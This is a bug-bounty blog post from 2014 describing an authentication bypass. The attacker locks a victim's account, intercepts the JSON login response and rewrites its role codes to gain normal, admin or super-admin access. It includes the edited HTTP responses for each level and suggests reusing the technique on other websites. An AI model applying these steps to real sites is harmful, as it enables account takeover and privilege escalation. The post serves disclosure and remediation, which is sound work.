Sunday, August 31, 2014

Privilege Escalation Using Authentication Bypass

A Way to Gain Super Admin & Admin Privileges By Bypassing Authentication

While researching and working on bug bounties in late Jan 2013, I have found a way to Bypass Authentication using which we can Takeover all the users account of the website and can also gain Super Admin and Admin privileges if that site is vulnerable to this type of attack.

Using this vulnerability the attacker can bypass the authentication bypass countermeasure and can predict the login validation & access control processes for any victims account by combinding a simple technique and in this way he can also Bypass Authentication of all passwords of all the accounts and can successfully compromise the victims account as the login validation process is predictable by the attacker.

I tried various techniques to Bypass the Login like Arbitrary Methods Usages, Anonymous Methods Usages but all these techniques failed, also there was a countermeasures that if we to modify the response can then if we send that modified response code as a request to the server then the server is not responding to the modified request and instead of replying it is dropping the modified request, so now the challenge was to bypass this countermeasure and also to understand the Login Validation Process and to find a weakness in it. So now I am mentioning how I was able to Bypass this Countermeasure and the Authentication.


Please Note: There was a precondition that an attacker shall now the victims login id or user id and shall lock the victims account.


During the testing we have found an attacker can bypass authentication of Super Admin, Admin & Normal(Read Only privileged ) users by locking the victims account and by modify the response json message.


Steps to Execute the Attack:

1. Go to the application login page and lock the victims account with 3 wrong password attempts.

2. Now Insert the normal(test) users username and with any random value as password.

3. Intercept the login request and forward it now the original response will be intercepted like mentioned below:


Original Response:

HTTP/1.1 200 OK
Server: Apache-Coyote
Content-disposition: attachment
Content-Type: application/json;charset=utf-8
Content-Length: 88
Date: Wed, 16 Jan 2013 10:05:20 GMT

OK[10,0,0,0,0,["site.com","You Account has been Locked, Please contact Administrator."]]


4. Now modify the original response as mentioned below but don't modify the status code 200 OK or any headers and forward the request, now the attacker successfully logs into the Normal Users(victims) account.


Modified Response to Bypass Authentication of Normal User:

HTTP/1.1 200 OK
Server: Apache-Coyote
Content-disposition: attachment
Content-Type: application/json;charset=utf-8
Content-Length: 44
Date: Wed, 16 Jan 2013 10:09:10 GMT

OK[10,0,0,0,0,["site.com,"N","Normal User"]]

Note: "10" denotes normal user and "N" denotes read only privilege.


5. Now to gain Admin user privileges while doing Authentication Bypass, repeat the step 1,2,3 and then modify the original response as mentioned below but don't modify the status code 200 OK or any headers  and forward the request, now the attacker successfully logs into the Admin Users(victims) account.

HTTP/1.1 200 OK
Server: Apache-Coyote
Content-disposition: attachment
Content-Type: application/json;charset=utf-8
Content-Length: 43
Date: Wed, 16 Jan 2013 10:13:07 GMT

OK[20,0,0,0,0,["site.com,"Y","Admin User"]]

Note: "20" denotes admin user and "Y" denotes write privilege.


6. Now to gain Super Admin user privileges while doing Authentication Bypass, repeat the step 1,2,3 and then modify the original response as mentioned below but don't modify the status code 200 OK or any headers and forward the request, now the attacker successfully logs into the Super Admin Users(victims) account.

HTTP/1.1 200 OK
Server: Apache-Coyote
Content-disposition: attachment
Content-Type: application/json;charset=utf-8
Content-Length: 49
Date: Wed, 16 Jan 2013 10:17:35 GMT

OK[30,0,0,0,0,["site.com,"Y","Super Admin User"]]

So in this way we can easily Bypass the Authentication an can gain Super Admin & Admin privileges :).


Impact: 

The Login Validation & Access Control Processes are Predictable using which an attacker can easily compromise any users account of the Application and can gain the Super Admin and Admin privileges also the modified(i.e tempered) response dropping countermeasure was bypassable.



Recommendation:

The Login Validation shall not be dependent on Response Code Values, Cookies Values and Json Based Status Code values etc combination. Also the it shall not be dependent on the Client-Side Validation or on modified request dropping based countermeasures instead proper Server-Side Validation shall be done for the Correct Passwords and there shall be proper access control.

So in this way one can do Privilege Escalation Using Authentication Bypass and can Bypass the authentication of any victims accounts by bypassing the modified request dropping countermeasure and by using the Login Validation & Access Control Processes Prediction. Also this way can be used to find same type of vulnerabilities on many different websites.


Suggestions and Feedbacks are welcome.